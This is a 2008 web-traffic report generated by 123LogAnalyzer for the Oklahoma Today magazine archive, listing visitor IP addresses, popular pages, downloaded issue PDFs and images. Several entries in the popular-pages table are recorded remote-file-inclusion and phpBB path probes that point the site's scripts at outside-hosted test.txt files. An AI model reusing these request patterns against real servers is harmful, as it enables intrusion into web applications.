14098.20.251.0DisabledUnited States of America14 mins 42 secsClick Here
141128.208.179.108DisabledUnited States of America14 mins 38 secsClick Here
14274.6.18.166DisabledUnited States of America14 mins 36 secsClick Here
143164.58.238.97DisabledUnited States of America14 mins 36 secsClick Here
144121.100.53.2DisabledUnited States of America14 mins 33 secsClick Here
14558.17.149.162DisabledUnited States of America14 mins 21 secsClick Here
14670.241.247.213DisabledUnited States of America14 mins 19 secsClick Here
14774.195.238.52DisabledUnited States of America14 mins 19 secsClick Here
148168.137.100.21DisabledUnited States of America14 mins 6 secsClick Here
14968.92.232.193DisabledUnited States of America14 mins 0 secsClick Here
15071.168.239.123DisabledUnited States of America13 mins 59 secsClick Here
151122.52.67.149DisabledUnited States of America13 mins 54 secsClick Here
15271.219.152.253DisabledUnited States of America13 mins 53 secsClick Here
15368.50.24.235DisabledUnited States of America13 mins 49 secsClick Here
15467.61.128.122DisabledUnited States of America13 mins 37 secsClick Here
15568.58.51.167DisabledUnited States of America13 mins 34 secsClick Here
15659.96.157.42DisabledUnited States of America13 mins 28 secsClick Here
1574.138.20.126DisabledUnited States of America13 mins 15 secsClick Here
15869.254.1.52DisabledUnited States of America13 mins 15 secsClick Here
159161.235.194.21DisabledUnited States of America13 mins 11 secsClick Here
16012.215.133.65DisabledUnited States of America13 mins 4 secsClick Here
161202.176.218.45DisabledUnited States of America13 mins 2 secsClick Here
162164.58.165.165DisabledUnited States of America12 mins 58 secsClick Here
16377.88.26.26DisabledUnited States of America12 mins 48 secsClick Here
16470.118.118.210DisabledUnited States of America12 mins 46 secsClick Here
16588.9.84.77DisabledUnited States of America12 mins 46 secsClick Here
166131.17.129.22DisabledUnited States of America12 mins 40 secsClick Here
16771.144.68.72DisabledUnited States of America12 mins 27 secsClick Here
16864.147.147.4DisabledUnited States of America12 mins 25 secsClick Here
169212.234.218.194DisabledFrance12 mins 19 secsClick Here
17068.12.150.168DisabledUnited States of America12 mins 5 secsClick Here
17168.97.170.183DisabledUnited States of America12 mins 4 secsClick Here
17269.30.171.98DisabledUnited States of America12 mins 0 secsClick Here
17370.20.165.231DisabledUnited States of America12 mins 0 secsClick Here
174144.9.8.21DisabledUnited States of America11 mins 56 secsClick Here
17569.19.14.37DisabledUnited States of America11 mins 54 secsClick Here
17624.160.133.69DisabledUnited States of America11 mins 46 secsClick Here
17770.177.111.142DisabledUnited States of America11 mins 43 secsClick Here
17870.233.152.104DisabledUnited States of America11 mins 43 secsClick Here
179147.64.230.80DisabledUnited States of America11 mins 43 secsClick Here
18079.229.117.185DisabledUnited States of America11 mins 34 secsClick Here
18185.5.91.127DisabledUnited States of America11 mins 32 secsClick Here
18264.235.249.114DisabledUnited States of America11 mins 30 secsClick Here
183130.67.33.105DisabledNorway11 mins 26 secsClick Here
18470.247.155.253DisabledUnited States of America11 mins 17 secsClick Here
18599.203.242.217DisabledUnited States of America11 mins 17 secsClick Here
186207.200.116.73DisabledUnited States of America11 mins 14 secsClick Here
187156.56.116.97DisabledUnited States of America11 mins 3 secsClick Here
188208.255.127.61DisabledUnited States of America10 mins 53 secsClick Here
189122.167.26.157DisabledUnited States of America10 mins 51 secsClick Here
190207.193.35.139DisabledUnited States of America10 mins 49 secsClick Here
19175.17.192.128DisabledUnited States of America10 mins 40 secsClick Here
19268.12.21.83DisabledUnited States of America10 mins 39 secsClick Here
19358.213.20.30DisabledUnited States of America10 mins 34 secsClick Here
194138.162.0.43DisabledUnited States of America10 mins 30 secsClick Here
195202.156.13.6DisabledSingapore10 mins 29 secsClick Here
196204.62.18.227DisabledUnited States of America10 mins 27 secsClick Here
197139.78.193.201DisabledUnited States of America10 mins 12 secsClick Here
19874.195.235.183DisabledUnited States of America10 mins 11 secsClick Here
19991.124.141.33DisabledUnited States of America10 mins 9 secsClick Here
200219.148.48.102DisabledUnited States of America10 mins 8 secsClick Here
20166.108.218.148DisabledUnited States of America10 mins 6 secsClick Here
202204.87.86.50DisabledUnited States of America10 mins 6 secsClick Here
20396.231.214.24DisabledUnited States of America10 mins 5 secsClick Here
20466.249.85.87DisabledUnited States of America10 mins 2 secsClick Here
20524.116.103.55DisabledUnited States of America9 mins 58 secsClick Here
20668.118.112.162DisabledUnited States of America9 mins 58 secsClick Here
207164.58.28.164DisabledUnited States of America9 mins 58 secsClick Here
20865.54.165.35DisabledUnited States of America9 mins 50 secsClick Here
209207.157.73.3DisabledUnited States of America9 mins 50 secsClick Here
21061.240.4.115DisabledUnited States of America9 mins 47 secsClick Here
211122.164.39.128DisabledUnited States of America9 mins 42 secsClick Here
212208.114.37.172DisabledUnited States of America9 mins 40 secsClick Here
21370.185.197.201DisabledUnited States of America9 mins 37 secsClick Here
214166.128.87.99DisabledUnited States of America9 mins 28 secsClick Here
215125.163.76.111DisabledUnited States of America9 mins 25 secsClick Here
21676.112.223.251DisabledUnited States of America9 mins 10 secsClick Here
21771.119.168.159DisabledUnited States of America9 mins 8 secsClick Here
21867.142.130.23DisabledUnited States of America9 mins 3 secsClick Here
21912.189.32.37DisabledUnited States of America9 mins 0 secsClick Here
22071.30.155.74DisabledUnited States of America8 mins 52 secsClick Here
221204.87.112.2DisabledUnited States of America8 mins 45 secsClick Here
22271.252.229.227DisabledUnited States of America8 mins 39 secsClick Here
22371.223.120.189DisabledUnited States of America8 mins 38 secsClick Here
22472.192.101.122DisabledUnited States of America8 mins 34 secsClick Here
22570.142.45.50DisabledUnited States of America8 mins 26 secsClick Here
22670.182.65.200DisabledUnited States of America8 mins 23 secsClick Here
22768.12.225.171DisabledUnited States of America8 mins 22 secsClick Here
22824.249.5.211DisabledUnited States of America8 mins 12 secsClick Here
22976.198.248.142DisabledUnited States of America8 mins 10 secsClick Here
23024.255.138.22DisabledUnited States of America8 mins 1 secsClick Here
23180.212.111.54DisabledUnited States of America7 mins 54 secsClick Here
23271.29.243.205DisabledUnited States of America7 mins 50 secsClick Here
23365.77.71.164DisabledUnited States of America7 mins 48 secsClick Here
23474.243.147.75DisabledUnited States of America7 mins 46 secsClick Here
235194.209.168.4DisabledSwitzerland7 mins 45 secsClick Here
23664.136.26.227DisabledUnited States of America7 mins 44 secsClick Here
237139.139.112.66DisabledUnited States of America7 mins 40 secsClick Here
23866.203.169.166DisabledUnited States of America7 mins 38 secsClick Here
23961.150.69.56DisabledChina7 mins 35 secsClick Here
240124.236.130.14DisabledUnited States of America7 mins 26 secsClick Here
24170.233.177.213DisabledUnited States of America7 mins 22 secsClick Here
24269.8.8.215DisabledUnited States of America7 mins 21 secsClick Here
24365.55.208.51DisabledUnited States of America7 mins 19 secsClick Here
24468.8.107.245DisabledUnited States of America7 mins 16 secsClick Here
245204.126.144.41DisabledUnited States of America7 mins 16 secsClick Here
24675.128.25.158DisabledUnited States of America7 mins 14 secsClick Here
247125.68.10.72DisabledUnited States of America7 mins 14 secsClick Here
24876.102.196.27DisabledUnited States of America7 mins 7 secsClick Here
249117.93.175.194DisabledUnited States of America7 mins 5 secsClick Here
25070.234.152.211DisabledUnited States of America7 mins 4 secsClick Here
25198.198.235.186DisabledUnited States of America7 mins 0 secsClick Here
25276.203.133.163DisabledUnited States of America6 mins 58 secsClick Here
25368.97.73.92DisabledUnited States of America6 mins 56 secsClick Here
25465.255.78.192DisabledUnited States of America6 mins 51 secsClick Here
25564.3.27.163DisabledUnited States of America6 mins 49 secsClick Here

Top Authenticated Visitors
Rank# User Name Last Visit Time Visits PageViews Stay Length Bandwidth(Megabytes)
1Non Authenticated Visitors01/Apr/2008:04:55:545876291728 days 0 hours 19 mins 15 secs32077.77

Powered by 123LogAnalyzer

123 Log Analyzer report

123 Log Analyzer Report

Report generated on Wed Jun 11 10:12:47 2008
Domain Name: digital.library.okstate.edu/oktoday

Time Period:01/Mar/2008:06:02:27 - 01/Apr/2008:04:55:54 total 32 day(s)
Most Used Browsers and Operation Systems

Visiting Spiders (Automated programs which search the Internet)
Rank# Spider Hits
1ia_archiver22

123 Log Analyzer report

123 Log Analyzer Report

Report generated on Wed Jun 11 10:12:48 2008
Domain Name: digital.library.okstate.edu/oktoday

Time Period:01/Mar/2008:06:02:27 - 01/Apr/2008:04:55:54 total 32 day(s)
Web pages and files statistics

Most Popular Web Pages
Rank# Page Hits Incomplete requests Visitors Data Transfered(KB)
1/oktoday/1824091711713
2/oktoday/index.html22301931143
3/oktoday/2000.html179017015224
4/oktoday/1960.html14201367856
5/oktoday/1970.html13901268439
6/oktoday/1950.html13101274007
7/oktoday/1980.html11801109331
8/oktoday/1990.html116010511085
9/oktoday/?cat=1&feed=comments-rss230320
10/oktoday/1960s/2020
11/oktoday/1980s/1980/2020
12/oktoday/1950s/1958/2020
13/oktoday/1950s/2020
14/oktoday/1980s/2020
15/oktoday/1990s/2020
16/oktoday/2000s/2004/1010
17/oktoday/2000s/2005/um?tim.com1011
18/oktoday/1970s/1010
19/oktoday/2000s/2005/oktdv55n31011
20/oktoday/1960s/1966/1010
21/oktoday/1960s/1961/1010
22/oktoday/Sources/Packages.php?sourcedir=http://www.mediumchannel.com/templates/t est.txt??1011
23/oktoday/protected.htm1012
24/oktoday/1950s/1953/1011
25/oktoday/1960s/1960/Springtlbhtar?.ny1011
26/oktoday/1950s/1957/1010
27/oktoday/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[9 99][0][loadFile]=http://www.pokerchipplanet.com/.../test.txt???1011
28/oktoday/2000s/2006/ow?bomatoday.com1011
29/oktoday/1960s/1969/about.php?/modules/Forums/admin/admin_db_utilities.php?phpbb _root_path=%20%22PHP-NUKE%22%20site:.ushttp://owell.us/bo.do??1011
30/oktoday/1970s/1970/1010
31/oktoday/1980s/1983/class.mysql.php?path_to_bt_dir=http://www.mediumchannel.com/ templates/test.txt??1011
32/oktoday/2000s/1010
33/oktoday/2000s/2000/1010
34/oktoday/1970s/1974/1010
35/oktoday/2000s/2001/1010
36/oktoday/1990s/1994/1010
37/oktoday/1980s/1984/1010
38/oktoday/1980s/1986/class.mysql.php?path_to_bt_dir=http://www.mediumchannel.com/ templates/test.txt??1011
39/oktoday/1980s/1983/about.php?/modules/Forums/admin/admin_db_utilities.php?phpbb _root_path=%20%22PHP-NUKE%22%20site:.ushttp://owell.us/bo.do??1011
40/oktoday/1990s/1991/1010
41/oktoday/1980s/1989/1010
42/oktoday/1990s/1990/1010
43/oktoday/1990s/1999/1010
44/oktoday/1990s/1998/1010
45/oktoday/2000s/2002/1010

Most Downloaded Files
Rank# File Hits Incomplete requests Visitors (Actual Downloads) Data Transfered(KB)
1/oktoday/2000s/2002/cafesanddiners.pdf10860N/A428743
2/oktoday/1980s/1980/oktdv30n2.pdf7800N/A381972
3/oktoday/2000s/2006/oktdv56n1sub.pdf6800N/A258990
4/oktoday/2000s/2003/guidetostay.pdf5600N/A302953
5/oktoday/1960s/1964/oktdv14n2.pdf5330N/A282849
6/oktoday/2000s/2006/oktdv56n6.pdf5260N/A388372
7/oktoday/1960s/1962/oktdv12n2.pdf5090N/A375646
8/oktoday/2000s/2006/oktdv56n5.pdf4800N/A335309
9/oktoday/1960s/1961/oktdv11n2.pdf4620N/A245931
10/oktoday/1980s/1981/oktdv31n2.pdf4430N/A222665
11/oktoday/1960s/1967/oktdv17n4.pdf4420N/A270156
12/oktoday/1980s/1983/oktdv33n2.pdf4160N/A232544
13/oktoday/1980s/1981/oktdv31n4.pdf4150N/A380010
14/oktoday/1980s/1982/oktdv32n3.pdf4080N/A300112
15/oktoday/1950s/1956/oktdv6n7.pdf3980N/A232604
16/oktoday/1950s/1958/oktdv8n4.pdf3930N/A237514
17/oktoday/1980s/1980/oktdv30n4.pdf3900N/A229183
18/oktoday/1980s/1986/oktdv36n3.pdf3840N/A270144
19/oktoday/1980s/1980/oktdv30n1.pdf3810N/A208647
20/oktoday/1980s/1984/oktdv34n4.pdf3710N/A338230
21/oktoday/1980s/1983/oktdv33n4.pdf3650N/A194517
22/oktoday/1980s/1980/oktdv30n3.pdf3640N/A267445
23/oktoday/1980s/1984/oktdv34n1.pdf3620N/A143258
24/oktoday/1950s/1956/oktdv6n8.pdf3490N/A425940
25/oktoday/1950s/1956/oktdv6n5.pdf3350N/A162184
26/oktoday/2000s/2005/oktdv55n3.pdf3250N/A243452
27/oktoday/1980s/1988/oktdv38n4.pdf3210N/A234197
28/oktoday/1970s/1974/oktdv24n2.pdf3190N/A173758
29/oktoday/1950s/1959/oktdv9n2.pdf3190N/A235090
30/oktoday/1960s/1967/oktdv17n3.pdf3120N/A206917
31/oktoday/1960s/1965/oktdv15n1.pdf3060N/A168475
32/oktoday/1980s/1982/oktdv32n1.pdf2980N/A165886
33/oktoday/1980s/1988/oktdv38n6.pdf2980N/A217225
34/oktoday/1990s/1999/oktdv49n5.pdf2940N/A97754
35/oktoday/1970s/1979/oktdv29n4.pdf2910N/A134035
36/oktoday/1980s/1988/oktdv38n2.pdf2910N/A276324
37/oktoday/1970s/1976/oktdv26n4.pdf2910N/A150700
38/oktoday/1990s/1992/oktdv42n3.pdf2900N/A155931
39/oktoday/2000s/2006/oktdv56n4.pdf2890N/A347034
40/oktoday/1970s/1977/oktdv27n1.pdf2830N/A200556
41/oktoday/1950s/1959/oktdv9n4.pdf2830N/A178140
42/oktoday/1980s/1982/oktdv32n4.pdf2820N/A172408
43/oktoday/1970s/1973/oktdv23n1.pdf2820N/A172936
44/oktoday/1960s/1964/oktdv14n3.pdf2810N/A161054
45/oktoday/2000s/2004/greatfinds.pdf2810N/A188885
46/oktoday/1950s/1957/oktdv7n7.pdf2780N/A160012
47/oktoday/1960s/1960/oktdv10n1.pdf2700N/A157478
48/oktoday/1980s/1981/oktdv31n3.pdf2700N/A164553
49/oktoday/1950s/1958/oktdv8n2.pdf2680N/A177510
50/oktoday/1960s/1968/oktdv18n1.pdf2650N/A197881
51/oktoday/1970s/1977/oktdv27n4.pdf2620N/A190846
52/oktoday/1970s/1978/oktdv28n2.pdf2590N/A203152
53/oktoday/1980s/1985/oktdv35n4.pdf2500N/A138578
54/oktoday/1970s/1972/oktdv22n2.pdf2440N/A202161
55/oktoday/1970s/1974/oktdv24n1.pdf2410N/A155161
56/oktoday/1980s/1989/oktdv39n2.pdf2390N/A174119
57/oktoday/1960s/1966/oktdv16n3.pdf2370N/A136138
58/oktoday/1980s/1983/oktdv33n3.pdf2340N/A157486
59/oktoday/1960s/1961/oktdv11n3.pdf2300N/A195559
60/oktoday/1960s/1965/oktdv15n2.pdf2280N/A111331
61/oktoday/2000s/2006/oktdv56n3.pdf2270N/A119799
62/oktoday/1970s/1975/oktdv25n2.pdf2260N/A254911
63/oktoday/1950s/1959/oktdv9n1.pdf2250N/A143527
64/oktoday/1980s/1986/oktdv36n4.pdf2150N/A150767
65/oktoday/1970s/1974/oktdv24n4.pdf2140N/A143524
66/oktoday/1980s/1981/oktdv31n1.pdf2110N/A134252
67/oktoday/1960s/1968/oktdv18n3.pdf2090N/A157779
68/oktoday/1970s/1973/oktdv23n2.pdf2080N/A160398
69/oktoday/1950s/1956/oktdv6n4.pdf2070N/A167646
70/oktoday/1990s/1991/oktdv41n5.pdf2050N/A80732
71/oktoday/1950s/1957/oktdv7n2.pdf2040N/A155173
72/oktoday/1990s/1995/oktdv45n5news.pdf2010N/A54614
73/oktoday/1970s/1975/oktdv25n4.pdf1970N/A196518
74/oktoday/1950s/1957/oktdv7n1.pdf1960N/A148437
75/oktoday/1960s/1965/oktdv15n3.pdf1940N/A170958
76/oktoday/2000s/2004/oktdv54n3.pdf1930N/A152501
77/oktoday/1980s/1983/oktdv33n1.pdf1910N/A153096
78/oktoday/1960s/1962/oktdv12n4.pdf1910N/A100716
79/oktoday/1970s/1975/oktdv25n1.pdf1880N/A119933
80/oktoday/1960s/1966/oktdv16n4.pdf1870N/A136754
81/oktoday/1970s/1970/oktdv20n1.pdf1850N/A171388
82/oktoday/1950s/1959/oktdv9n3.pdf1840N/A153505
83/oktoday/1990s/1996/oktdv46n5.pdf1830N/A167259
84/oktoday/1970s/1979/oktdv29n3.pdf1830N/A119871
85/oktoday/1970s/1970/oktdv20n4.pdf1790N/A113137
86/oktoday/1990s/1999/oktdv49n2.pdf1780N/A54522
87/oktoday/1970s/1979/oktdv29n2.pdf1770N/A167860
88/oktoday/1960s/1960/oktdv10n4.pdf1740N/A92816
89/oktoday/1970s/1972/oktdv22n3.pdf1740N/A105605
90/oktoday/1950s/1956/oktdv6n6.pdf1730N/A86136
91/oktoday/2000s/2002/oktdv52n6.pdf1720N/A123908
92/oktoday/1960s/1963/oktdv13n4.pdf1710N/A80460
93/oktoday/1960s/1961/oktdv11n4.pdf1710N/A147496
94/oktoday/1960s/1963/oktdv13n3.pdf1700N/A121881
95/oktoday/1960s/1960/oktdv10n3.pdf1660N/A84828
96/oktoday/1960s/1969/oktdv19n4.pdf1660N/A101765
97/oktoday/1990s/1994/1994yir.pdf1600N/A98871
98/oktoday/1970s/1977/oktdv27n3.pdf1600N/A99316
99/oktoday/2000s/2005/oktdv55n2.pdf1600N/A133043
100/oktoday/1970s/1973/oktdv23n4.pdf1570N/A100840
101/oktoday/1990s/1993/oktdv43n1.pdf1540N/A51734
102/oktoday/1960s/1963/oktdv13n2.pdf1540N/A88124
103/oktoday/1960s/1965/oktdv15n4.pdf1530N/A91104
104/oktoday/1970s/1970/oktdv20n3.pdf1530N/A146096
105/oktoday/1970s/1976/oktdv26n1.pdf1520N/A130419
106/oktoday/1970s/1971/oktdv21n2.pdf1510N/A160878
107/oktoday/1970s/1972/oktdv22n1.pdf1480N/A98632
108/oktoday/1960s/1969/oktdv19n1.pdf1470N/A123930
109/oktoday/1960s/1968/oktdv18n4.pdf1460N/A108569
110/oktoday/1950s/1956/oktdv6n9.pdf1420N/A134527
111/oktoday/1960s/1967/oktdv17n2.pdf1420N/A123086
112/oktoday/2000s/2000/cir.pdf1410N/A150290
113/oktoday/1960s/1969/oktdv19n2.pdf1400N/A92998
114/oktoday/2000s/2003/oktdv53n6.pdf1390N/A146568
115/oktoday/1950s/1957/oktdv7n3.pdf1360N/A139573
116/oktoday/1970s/1971/oktdv21n4.pdf1360N/A97398
117/oktoday/1970s/1977/oktdv27n2.pdf1360N/A80674
118/oktoday/1990s/1997/oktdv47n3.pdf1320N/A123842
119/oktoday/1970s/1979/oktdv29n1.pdf1310N/A110238
120/oktoday/2000s/2001/oktdv51n7.pdf1280N/A79504
121/oktoday/1990s/1998/oktdv48n7.pdf1270N/A101661
122/oktoday/1960s/1966/oktdv16n1.pdf1270N/A114566
123/oktoday/2000s/2003/oktdv53n3.pdf1260N/A137594
124/oktoday/1950s/1957/oktdv7n4.pdf1260N/A115632
125/oktoday/1990s/1999/oktdv49n1.pdf1260N/A113216
126/oktoday/1970s/1971/oktdv21n3.pdf1250N/A81336
127/oktoday/1960s/1964/oktdv14n4.pdf1230N/A81123
128/oktoday/1980s/1985/oktdv35n5.pdf1230N/A154316
129/oktoday/1990s/1990/oktdv40n5.pdf1220N/A75724
130/oktoday/1990s/1990/oktdv40n3.pdf1220N/A74024
131/oktoday/1990s/1995/oktdv45n2.pdf1210N/A86564
132/oktoday/2000s/2006/oktdv56n2.pdf1200N/A129492
133/oktoday/1990s/1990/oktdv40n1.pdf1200N/A87226
134/oktoday/1960s/1964/oktdv14n1.pdf1190N/A88816
135/oktoday/1980s/1988/oktdv38n5.pdf1180N/A98825
136/oktoday/1970s/1972/oktdv22n4.pdf1150N/A109586
137/oktoday/2000s/2001/oktdv51n5.pdf1140N/A133031
138/oktoday/1960s/1961/oktdv11n1.pdf1140N/A100256
139/oktoday/1990s/1996/oktdv46n2.pdf1130N/A87002
140/oktoday/1980s/1984/oktdv34n5.pdf1130N/A110499
141/oktoday/1970s/1976/oktdv26n3.pdf1080N/A113711
142/oktoday/2000s/2005/oktdv55n4.pdf1080N/A101967
143/oktoday/1990s/1995/1995yir.pdf1060N/A126550
144/oktoday/1990s/1990/oktdv40n6.pdf1040N/A66461
145/oktoday/1950s/1958/oktdv8n3.pdf1010N/A85226
146/oktoday/1960s/1960/oktdv10n2.pdf1010N/A81470
147/oktoday/1960s/1968/oktdv18n2.pdf1000N/A105386
148/oktoday/1990s/1996/1996yir.pdf1000N/A105070
149/oktoday/2000s/2001/oktdv51n1.pdf990N/A198293
150/oktoday/2000s/2006/oktdv56n1news.pdf960N/A111466
151/oktoday/1960s/1969/oktdv19n3.pdf960N/A65147
152/oktoday/1970s/1978/oktdv28n4.pdf950N/A81607
153/oktoday/1990s/1990/oktdv40n4.pdf940N/A70446
154/oktoday/2000s/2004/oktdv54n4.pdf940N/A102133
155/oktoday/1980s/1986/oktdv36n1.pdf920N/A130609
156/oktoday/2000s/2005/oktdv55n5news.pdf910N/A70843
157/oktoday/1960s/1962/oktdv12n3.pdf890N/A95726
158/oktoday/1960s/1962/oktdv12n1.pdf840N/A104310
159/oktoday/2000s/2004/oktdv54n2.pdf840N/A113899
160/oktoday/2000s/2000/oktdv50n6.pdf820N/A85154
161/oktoday/1970s/1971/oktdv21n1.pdf820N/A93002
162/oktoday/1960s/1963/oktdv13n1.pdf820N/A85463
163/oktoday/2000s/2003/oktdv53n5.pdf800N/A104056
164/oktoday/2000s/2002/oktdv52n2.pdf790N/A86718
165/oktoday/2000s/2000/oktdv50n5.pdf770N/A87957
166/oktoday/2000s/2000/oktdv50n1sub.pdf760N/A112952
167/oktoday/1990s/1991/oktdv41n3.pdf740N/A91638
168/oktoday/1990s/1994/oktdv44n3.pdf740N/A83194
169/oktoday/2000s/2005/oktdv55n6.pdf720N/A109196
170/oktoday/2000s/2002/oktdv52n3.pdf720N/A96605
171/oktoday/1980s/1985/oktdv35n3.pdf720N/A111377
172/oktoday/2000s/2005/oktdv55n1.pdf700N/A70908
173/oktoday/1990s/1991/oktdv41n4.pdf690N/A66949
174/oktoday/2000s/2003/oktdv53n4.pdf690N/A78459
175/oktoday/1980s/1989/oktdv39n5.pdf670N/A114987
176/oktoday/1990s/1991/oktdv41n6.pdf660N/A62136
177/oktoday/1990s/1998/oktdv48n5.pdf660N/A77670
178/oktoday/1980s/1986/oktdv36n5.pdf660N/A88593
179/oktoday/2000s/2002/oktdv52n5.pdf660N/A100152
180/oktoday/2000s/2002/oktdv52n4.pdf650N/A118213
181/oktoday/1970s/1978/oktdv28n1.pdf650N/A41208
182/oktoday/1990s/1992/oktdv42n1.pdf640N/A74160
183/oktoday/1990s/1990/oktdv40n2.pdf640N/A50149
184/oktoday/1990s/1996/oktdv46n4.pdf640N/A42102
185/oktoday/2000s/2004/oktdv54n6.pdf630N/A73689
186/oktoday/1990s/1998/oktdv48n3.pdf630N/A81196
187/oktoday/2000s/2005/oktdv55n5sub.pdf620N/A64391
188/oktoday/2000s/2001/oktdv51n3.pdf620N/A79458
189/oktoday/1980s/1988/oktdv38n3.pdf610N/A88266
190/oktoday/2000s/2002/oktdv52n7.pdf600N/A69006
191/oktoday/2000s/2001/oktdv51n4.pdf590N/A94072
192/oktoday/1990s/1998/oktdv48n4.pdf550N/A57368
193/oktoday/2000s/2000/oktdv50n1news.pdf540N/A63259
194/oktoday/1980s/1987/oktdv37n2.pdf540N/A95096
195/oktoday/1980s/1986/oktdv36n6.pdf530N/A67738
196/oktoday/1980s/1984/oktdv34n3.pdf520N/A92915
197/oktoday/1990s/1999/oktdv49n4.pdf510N/A65581
198/oktoday/1990s/1993/oktdv43n2.pdf510N/A81098
199/oktoday/2000s/2001/oktdv51n6.pdf510N/A92612
200/oktoday/2000s/2001/oktdv51n2.pdf500N/A79026
201/oktoday/1990s/1992/oktdv42n2.pdf500N/A73600
202/oktoday/2000s/2003/oktdv53n2.pdf500N/A99953
203/oktoday/2000s/2000/oktdv50n3.pdf490N/A76547
204/oktoday/1990s/1995/oktdv45n1.pdf480N/A83991
205/oktoday/1990s/1992/oktdv42n4.pdf480N/A72850
206/oktoday/1980s/1987/oktdv37n1.pdf470N/A79426
207/oktoday/2000s/2002/oktdv52n1.pdf470N/A88693
208/oktoday/1960s/1967/oktdv17n1.pdf460N/A73220
209/oktoday/1970s/1970/oktdv20n2.pdf440N/A54779
210/oktoday/1990s/1998/oktdv48n2.pdf440N/A44480
211/oktoday/2000s/2003/oktdv53n1.pdf440N/A116628
212/oktoday/1980s/1987/oktdv37n3.pdf430N/A95191
213/oktoday/1990s/1991/oktdv41n1.pdf420N/A58092
214/oktoday/1990s/1997/oktdv47n5.pdf420N/A80880
215/oktoday/2000s/2004/oktdv54n1.pdf390N/A58598
216/oktoday/1990s/1994/oktdv44n6.pdf380N/A35706
217/oktoday/1980s/1987/oktdv37n4.pdf380N/A65690
218/oktoday/1990s/1993/oktdv43n5.pdf370N/A62056
219/oktoday/1980s/1989/oktdv39n1.pdf370N/A128967
220/oktoday/1990s/1993/oktdv43n4.pdf360N/A47769
221/oktoday/1970s/1975/oktdv25n3.pdf350N/A119848
222/oktoday/1980s/1985/oktdv35n1.pdf320N/A69467
223/oktoday/1990s/1996/oktdv46n6news.pdf310N/A58631
224/oktoday/1990s/1998/oktdv48n6.pdf310N/A63479
225/oktoday/1970s/1974/oktdv24n3.pdf300N/A76006
226/oktoday/1980s/1987/oktdv37n5.pdf300N/A82731
227/oktoday/1980s/1985/oktdv35n2.pdf290N/A67197
228/oktoday/1970s/1973/oktdv23n3.pdf290N/A69398
229/oktoday/1990s/1997/oktdv47n1.pdf250N/A55029
230/oktoday/1990s/1991/oktdv41n2.pdf250N/A57364
231/oktoday/1980s/1989/oktdv39n6.pdf240N/A106047
232/oktoday/1990s/1992/oktdv42n6.pdf240N/A57752
233/oktoday/2000s/2004/oktdv54n5.pdf240N/A47096
234/oktoday/1990s/1996/oktdv46n3.pdf230N/A62184
235/oktoday/1980s/1986/oktdv36n2.pdf220N/A90703
236/oktoday/1980s/1985/oktdv35n6.pdf210N/A97010
237/oktoday/1990s/1992/oktdv42n5.pdf210N/A47611
238/oktoday/1990s/1996/oktdv46n1.pdf200N/A44177
239/oktoday/1990s/1994/oktdv44n2.pdf190N/A36812
240/oktoday/1990s/1995/oktdv45n5sub.pdf190N/A59041
241/oktoday/1970s/1978/oktdv28n3.pdf190N/A49042
242/oktoday/1980s/1989/oktdv39n3.pdf190N/A88699
243/oktoday/1990s/1999/oktdv49n3.pdf180N/A27823
244/oktoday/1990s/1996/oktdv46n6sub.pdf180N/A65729
245/oktoday/1990s/1993/oktdv43n3.pdf180N/A39851
246/oktoday/1980s/1989/oktdv39n4.pdf170N/A68440
247/oktoday/1980s/1987/oktdv37n6.pdf170N/A70226
248/oktoday/1980s/1984/oktdv34n2.pdf170N/A48503
249/oktoday/1990s/1997/oktdv47n2.pdf170N/A45477
250/oktoday/1990s/1995/oktdv45n6.pdf170N/A59584
251/oktoday/1970s/1976/oktdv26n2.pdf160N/A49008
252/oktoday/1990s/1999/oktdv49n6.pdf160N/A24102
253/oktoday/2000s/2000/oktdv50n2.pdf160N/A49845
254/oktoday/1960s/1966/oktdv16n2.pdf150N/A62735
255/oktoday/1990s/1995/oktdv45n4.pdf140N/A67497
256/oktoday/1990s/1993/oktdv43n6.pdf140N/A54115
257/oktoday/1990s/1995/oktdv45n3.pdf140N/A51947
258/oktoday/1990s/1999/oktdv49n7.pdf130N/A52319
259/oktoday/1990s/1994/oktdv44n4.pdf130N/A49549
260/oktoday/1980s/1982/oktdv32n2.pdf120N/A81749
261/oktoday/1990s/1997/oktdv47n4.pdf110N/A35462
262/oktoday/1980s/1988/oktdv38n1.pdf110N/A58035
263/oktoday/1980s/1984/oktdv34n6.pdf100N/A47961
264/oktoday/2000s/2000/oktdv50n4.pdf100N/A103413
265/oktoday/1990s/1994/oktdv44n5.pdf100N/A22344
266/oktoday/1990s/1994/oktdv44n1.pdf100N/A50488
267/oktoday/1990s/1998/oktdv48n1.pdf90N/A24751
268/oktoday/2000s/2005/oktdv55n3.pdfdigital.library.okstate.edu/oktoday/2000s/2005/ oktdv55n3.pdfdigital.library.okstate.edu/oktoday/2000s/2005/digital.library.okst ate.edu/oktoday/2000s/2005/oktdv55n3.pdf10N/A1
269/oktoday/2000s/2006/wuntryp&on.wm10N/A1
270/oktoday/1960s/1968/SC.QB.)10N/A1
271/oktoday/2000s/2005/mdemorepumpkinfarm.wm10N/A1
272/oktoday/2000s/2000/oktdv50n1.pdf10N/A1
273/oktoday/2000s/2002/oktdv52n5.pdf+-+2007-04-1110N/A1

Most Popular Images
Rank# Image Hits Incomplete requests Data Transfered(KB)
1/oktoday/images/OT-Banner_01.gif4140235
2/oktoday/images/OT-Banner_10.gif4130151
3/oktoday/images/OT-Banner_03.gif4130258
4/oktoday/images/OT-Banner_04.gif4120151
5/oktoday/images/okt.gif41201796
6/oktoday/images/OT-Banner_07.gif4120354
7/oktoday/images/OT-Banner_05.gif4110374
8/oktoday/images/OT-Banner_06.gif4110151
9/oktoday/images/OT-Banner_12.gif4110193
10/oktoday/images/OT-Banner_08.gif4110151
11/oktoday/images/OT-Banner_09.gif4110558
12/oktoday/images/OT-Banner_11.gif4100339
13/oktoday/images/OT-Banner_02.gif4090150
14/oktoday/images/pdf.gif4090477
15/oktoday/images/archive_logo6.jpg266014610
16/oktoday/intro.swf256014208
17/oktoday/images/magazine-ad.jpg24101669
18/oktoday/images/okt-logo.gif2400651
19/oktoday/ok.jpg235014139
20/oktoday/Site/images/misc/archive_logo6.jpg203

Most Popular Directories
Rank# Directory Hits Data Transfered(KB)
1/oktoday/images/716724256
2/oktoday/336797172
3/oktoday/2000s/2006/24321690488
4/oktoday/1980s/1980/19171087249
5/oktoday/2000s/2002/17321112190
6/oktoday/1950s/1956/16041209039
7/oktoday/1980s/1981/1340901483
8/oktoday/1980s/1983/1206737645
9/oktoday/2000s/2003/1108986285
10/oktoday/1980s/1988/1100972876
11/oktoday/1960s/1964/1058613848
